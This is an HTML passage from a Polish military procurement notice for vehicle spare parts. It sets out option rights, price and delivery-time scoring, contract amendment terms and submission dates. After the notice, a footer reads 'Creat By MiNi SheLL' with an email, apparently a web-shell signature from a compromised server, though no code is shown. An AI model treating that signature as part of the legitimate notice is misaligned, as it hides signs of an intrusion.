ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN DOSTAWY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest: „Dostawa części zapasowych do pojazdów do transportu towarów, pojazdów pasażersko towarowych i samochodów z podziałem na cztery (4) zadania.” <br/>ZADANIE Nr 1 - HONKER<br/>ZADANIE Nr 2 – MERCEDES<br/>ZADANIE Nr 3 - RENAULT, VOLVO, SCANIA<br/>ZADANIE Nr 4 – Naczepa NS-600W<br/><br/>Szczegółowa lista asortymentowa wraz z ilościami podana jest <br/>w formularzu cenowym (załącznik nr 3 do SWZ).<br/>1.	Dostarczony Asortyment powinien być fabrycznie nowy, wolny od wad fizycznych <br/>i prawnych, nieużywany i nieregenerowany co powinno być odzwierciedlone <br/>w „Protokole przyjęcia – przekazania.<br/>2.	Wszystkie materiały – wyroby muszą być dopuszczone do obrotu i powszechnego stosowania zgodnie z obowiązującym prawem, na podstawie certyfikatów zgodności.<br/>3.	Dostarczony Asortyment powinien być wykonany zgodnie z dokumentacją techniczną <br/>i wymaganiami technicznymi opracowanymi przez producenta, spełniające wymagania jakościowe określone w dokumentacji technicznej producenta na dany wybór, zgodnie <br/>z oznaczeniem katalogowym.<br/>4.	Dostarczony Asortyment powinien być opakowany i zakonserwowany metodą zapewniającą zachowanie właściwości oraz parametrów techniczno-eksploatacyjnych podczas transportu oraz przechowywania w warunkach magazynowych przez co najmniej 24 miesiące od daty realizacji przedmiotu umowy.<br/>5.	Dostarczony Asortyment powinien być dostarczony w opakowaniach fabrycznych <br/>z oznaczeniami producenta i numerami katalogowymi, jeżeli występują. Jeżeli nie występuje opakowanie zewnętrzne dostarczonych artykułów muszą posiadać informację umożliwiającą identyfikację poszczególnych artykułów (ilość, rodzaj, parametry techniczne) bez konieczności naruszania opakowania, które powinno posiadać wszelkie zabezpieczenia stosowane przez producenta (np. hologramy).<br/>Zakres rzeczowy przedmiotu umowy składa się z zamówienia podstawowego <br/>oraz zamówienia objętego prawem opcji.<br/>UWAGA!<br/>Szczegółowy zakres przedmiotu zamówienia określają: opis zawarty w formularzu cenowym (załącznik nr 3) oraz projektowane postanowienia umowy (załącznik nr 4 do SWZ). </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">34330000-9 - Części zapasowe do pojazdów do transportu towarów, pojazdów pasażersko-towarowych i samochodów</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 7.	Wykonawca oświadcza, iż zrealizuje postanowienia niniejszej umowy zgodnie ze złożoną ofertą, w sposób profesjonalny oraz z najwyższą starannością.<br/>8.	Zakres rzeczowy przedmiotu umowy składa się z zamówienia podstawowego oraz zamówienia objętego prawem opcji*.<br/>9.	Zamawiający uprawniony jest do skorzystania z prawa opcji przez cały okres obowiązywania umowy, a Wykonawca zobowiązany jest dostarczyć Asortyment objęty prawem opcji* po cenach jednostkowych wskazanych w swojej ofercie.<br/>10.	Do zamówień objętych prawem opcji* stosuje się postanowienia odnoszące się <br/>do zamówienia podstawowego.<br/>11.	Zamawiający skorzysta z prawa opcji* w przypadku wystąpienia potrzeby pozyskania dodatkowych ilości Asortymentu.<br/>12.	Zamawiający zastrzega sobie prawo do nie wykorzystania całości bądź części zamówienia objętego prawem opcji*, a Wykonawca oświadcza, iż nie będzie z tego powodu wnosił żadnych roszczeń.<br/>13.	Warunkiem uruchomienia prawa opcji* jest oświadczenie woli Zamawiającego <br/>o uruchomieniu prawa opcji poprzez poinformowanie Wykonawcy stosownym pismem <br/>- przesłania przez Zamawiającego zapotrzebowania podpisanego przez Szefa Służby <br/>z 25. Wojskowego Oddziału Gospodarczego w Białymstoku <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2025-11-28</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">a.)	Kryterium cena – 60 % wartości zamówienia (brutto)<br/>Cena powinna obejmować koszt wykonania całości zamówienia, w tym wszystkie koszty pośrednie związane z wykonywaniem zamówienia.<br/><br/>wartość oferty najniższej <br/>----------------------------------- x 60 pkt = liczba punktów uzyskanych<br/>wartość oferty rozpatrywanej <br/><br/>b.)	Kryterium ,,termin dostawy’’- 40 %<br/>Dostawa zamówienia podstawowego od momentu zawarcia umowy:<br/>- 1-5 dni roboczych: 40% (40 pkt),<br/>- 6-10 dni roboczych: 30% (30 pkt),<br/>- 11-15 dni roboczych: 20% (20 pkt),<br/>- 16-21 dni roboczych: 10% (10 pkt),</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">TERMIN DOSTAWY</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza wprowadzenie istotnych zmian umowy, w sytuacjach określonych w granicach unormowania art. 454 i art. 455 ustawy Prawo zamówień publicznych w szczególności w przypadku gdy konieczność wprowadzenia takich zmian wynikałaby z okoliczności, których nie można było przewidzieć w chwili zawierania umowy: <br/>1) zmiany terminu wykonania umowy – gdy z powodu działania siły wyższej nie jest możliwe wykonanie przedmiotu umowy w umówionym terminie, bądź gdy niewykonanie umowy w terminie wyniknie z przyczyn leżących po stronie Zamawiającego <br/>lub użytkownika końcowego. Przez siłę wyższą rozumie się wszelkie nieprzewidziane zdarzenia powstałe poza kontrolą stron, których nie mógłby przewidzieć ani ich zapobiec, mimo dołożenia wszelkich starań, takich jak : katastrofalne działania siły przyrody, wojna, strajki generalne, ataki terrorystyczne, akty władzy publicznej, którym nie może przeciwstawić się jednostka itp. W przypadku siły wyższej strona dotknięta jej działaniem niezwłocznie poinformuje pisemnie stronę i uzgodni tryb dalszego postępowania.<br/>2) zmiany wynagrodzenia – w przypadku zmiany przepisów prawnych (np. VAT), jeżeli wpływa ona na wysokość należnego wykonawcy wynagrodzenia - zgodnie <br/>ze zmienionymi przepisami; <br/>3) innych istotnych postanowień umowy - gdy ich zmiana jest konieczna w związku <br/>ze zmianą przepisów prawa powszechnie obowiązującego, zmianą decyzji wydawanych przez Ministra Obrony Narodowej, bądź zmianą wytycznych przełożonych Zamawiającego,<br/><br/><br/>4) zmiana określonego producenta, typu i modeli u przedmiotu umowy, w przypadku zakończenia jego produkcji lub wycofania go z produkcji, z tym że cena wskazana <br/>w § 3 umowy nie może ulec podwyższeniu, a parametry techniczne nie mogą być gorsze niż wskazane w załączniku do umowy,<br/>2.	Zmiana postanowień zawartej umowy może nastąpić za zgodą obu Stron wyrażoną <br/>na piśmie, w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.<br/>3.	W celu dokonania zmian zapisów umowy wnioskowanych przez Stronę zobowiązana <br/>jest ona pisemnie wystąpić z propozycją zmiany warunków umowy wraz z ich uzasadnieniem. Zmiany te muszą być korzystne lub neutralne dla Zamawiającego. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-06-17 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/25wog_wp</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-06-17 11:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-07-17</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com